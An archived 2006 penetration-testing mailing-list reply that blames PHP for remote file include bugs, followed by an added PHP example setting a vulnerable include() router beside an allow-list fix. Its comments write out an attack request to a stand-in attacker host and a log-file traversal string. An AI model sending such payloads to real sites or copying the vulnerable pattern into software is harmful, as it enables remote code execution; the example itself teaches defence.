Penetration Testing mailing list archives

Re: Remote File Include Vulns (Are you testing for it, are you teaching it)


From: Tim <tim-pentest () sentinelchicken org>
Date: Mon, 16 Oct 2006 14:43:11 -0400

Hi Joseph,

> I'm curious how many auditors are 1) testing for this stuff in your
> audits. Tons of blog, forum, and wiki packages have these vulns - are
> you guys testing for this stuff, and more importantly are you finding it
> vuln in your audits?

No, I haven't found this in any of my audits, because none of my clients
use PHP.

> Next question is for trainers, how much time are you spending on this
> stuff in your web application security classes. Currently I'm spending a

No, I haven't really included this in training... I recommend people
instead use a different language.  But, as I mentioned above, none of
the clients I've given training to use PHP.  

Seriously though, this whole remote file include issue would be
non-existent if the PHP developers took a minute to think about the need
for such an idiotic feature.  Yet this category of vulnerability has
scored as one of the most numerous reported to the CVE.  That's just
disgusting.  How many other blatantly unsafe features have made it into
PHP now, with that kind of development oversight?

I'm a big fan of open source, and I used to code in PHP to pay the
bills, so don't take my criticism as a LAMP vs .NET argument.  I just
recommend the P in LAMP to be something other than PHP.

It's kinda cold out today, so let the flames begin,
tim
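The feature the message above is complaining about, shown as an added example that is not part of the original post or thread: a page router that passes request input straight to include(), beside an allow-list version that never lets the request value become part of a path. The function names, the PAGES map and the pages/ directory are assumptions for illustration, and the code assumes PHP 7 or later syntax. One historical caveat: the allow_url_include setting referred to in the comments only appeared in PHP 5.2; when this message was written, remote includes were governed by allow_url_fopen alone.

```php
<?php
// Added example; not code from the original post or from any project it names.

// VULNERABLE: an attacker-controlled string reaches include().
// With remote URL includes enabled (allow_url_fopen on PHP 5.1 and earlier,
// allow_url_include from 5.2 on), a request such as
//   ?page=http://attacker.example/x?
// makes PHP fetch and execute remote code (the trailing "?" turns the
// appended ".php" into a query string). With remote includes disabled it is
// still a local file include: ?page=../../../../var/log/apache2/access_log
// (plus a null byte on pre-5.3 builds to drop the suffix) reaches local files.
function render_page_vulnerable(string $page): void
{
    include $page . '.php';
}

// HARDENED: map the untrusted name to a fixed set of known files.
// The request value is only ever used as an array key; the paths are
// constants chosen by the application, so neither a URL nor a traversal
// sequence can be smuggled into include().
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',     // assumed layout
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the allow-listed path for a page name, or null if unknown.
function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;
}

function render_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Defence in depth for the hardened version, set in php.ini rather than here:
//   allow_url_include = Off   (PHP 5.2+; no remote code via include/require)
//   allow_url_fopen   = Off   (if the app never needs URL wrappers at all)
// These settings limit damage; they do not replace the allow-list above,
// because a local file include is still code execution whenever the
// attacker can write to any readable file (logs, uploads, session files).

render_page_hardened($_GET['page'] ?? 'home');
```

The allow-list is the real fix; the php.ini settings only narrow the blast radius. A code review or scan for this class of bug looks for include, require, include_once and require_once whose argument is built from $_GET, $_POST, $_COOKIE, $_REQUEST or any value derived from them.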

